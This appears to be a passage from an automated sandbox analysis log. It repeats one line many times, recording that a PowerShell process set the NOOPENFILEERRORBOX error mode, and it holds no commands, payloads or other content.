                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
